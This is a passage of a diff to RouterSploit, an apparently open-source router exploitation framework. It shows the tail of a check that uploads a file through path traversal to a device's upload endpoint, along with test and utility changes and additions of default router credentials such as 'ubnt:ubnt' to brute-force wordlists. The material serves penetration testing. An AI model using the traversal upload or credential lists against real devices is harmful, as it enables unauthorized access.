verify_upload = http_request(url=airview_url, method='GET')
#Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
if('vulnerable'+rand_str in verify_upload.text):
return True
else:
return False
routersploit/test/test_completer.py
......@@ -135,7 +135,7 @@ class RoutersploitCompleterTest(unittest.TestCase):
self.set_module()
self.rsf.send("set \t\t")
self.assertPrompt(
'passwords port target threads usernames verbosity \r\n',
'passwords stop_on_success threads verbosity\r\nport target usernames \r\n',
self.module_prompt('FTP Bruteforce'),
'set ',
)
......
routersploit/test/test_interpreter.py
......@@ -22,8 +22,8 @@ class RoutersploitInterpreterTest(unittest.TestCase):
RoutersploitInterpreter.setup = mock.Mock()
self.interpreter = RoutersploitInterpreter()
self.interpreter.current_module = mock.MagicMock()
self.raw_prompt_default = "\033[4mrsf\033[0m > "
self.module_prompt_default = lambda x: "\033[4mrsf\033[0m (\033[91m{}\033[0m) > ".format(x)
self.raw_prompt_default = "\001\033[4m\002rsf\001\033[0m\002 > "
self.module_prompt_default = lambda x: "\001\033[4m\002rsf\001\033[0m\002 (\001\033[91m\002{}\001\033[0m\002) > ".format(x)
def prepare_prompt_env_variables(self, raw_prompt=None, module_prompt=None):
if raw_prompt:
......@@ -290,7 +290,7 @@ class RoutersploitInterpreterTest(unittest.TestCase):
@mock.patch('__builtin__.print')
def test_command_show_info(self, mock_print):
metadata = {
'targets': 'target_desc',
'devices': 'target_desc',
'authors': 'authors_desc',
'references': 'references_desc',
'description': 'description_desc',
......@@ -308,7 +308,7 @@ class RoutersploitInterpreterTest(unittest.TestCase):
mock.call('name_desc'),
mock.call('\nDescription:'),
mock.call('description_desc'),
mock.call('\nTargets:'),
mock.call('\nDevices:'),
mock.call('target_desc'),
mock.call('\nAuthors:'),
mock.call('authors_desc'),
......
routersploit/utils.py
......@@ -5,6 +5,7 @@ from distutils.util import strtobool
import sys
import random
import string
import socket
import requests
......@@ -125,11 +126,7 @@ def multi(fn):
_, _, feed_path = self.target.partition("file://")
try:
file_handler = open(feed_path, 'r')
except IOError:
print_error("Could not read file: {}".format(self.target))
return
with open(feed_path) as file_handler:
for target in file_handler:
target = target.strip()
if not target:
......@@ -139,12 +136,16 @@ def multi(fn):
self.port = port
else:
self.port = original_port
print_status("Attack against: {}:{}".format(self.target, self.port))
print_status("Attack against: {}:{}".format(self.target,
self.port))
fn(self, *args, **kwargs)
self.target = original_target
self.port = original_port
file_handler.close()
return # Nothing to return, ran multiple times.
except IOError:
print_error("Could not read file: {}".format(self.target))
return
else:
return fn(self, *args, **kwargs)
return wrapper
......@@ -338,6 +339,9 @@ def http_request(method, url, **kwargs):
except requests.RequestException as error:
print_error(error)
return
except socket.error as err:
print_error(err)
return
except KeyboardInterrupt:
print_info()
print_status("Module has been stopped")
......
routersploit/wordlists/defaults.txt
......@@ -166,6 +166,7 @@ admin:rmnetlm
admin:root
admin:secure
admin:setup
admin:sky
admin:smallbusiness
admin:smcadmin
admin:superuser
......@@ -384,6 +385,7 @@ topicalt:password
topicnorm:password
topicres:password
tw:tw
ubnt:ubnt
user:pass
user:password
user:public
......
routersploit/wordlists/passwords.txt
......@@ -108,7 +108,6 @@ MPE
MServer
Manager
Master
Mau’dib
Menara
MiniAP
Multi
......@@ -146,6 +145,7 @@ RSX
SECURITY
SERVICE
SESAME
sky
SKY_FOX
SMDR
SSA
......@@ -479,6 +479,7 @@ truetime
trustno1
tslinux
tuxalize
ubnt
uplink
user
visual
......
routersploit/wordlists/usernames.txt
......@@ -256,6 +256,7 @@ tiger
topicalt
topicnorm
topicres
ubnt
user
vcr
veda
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment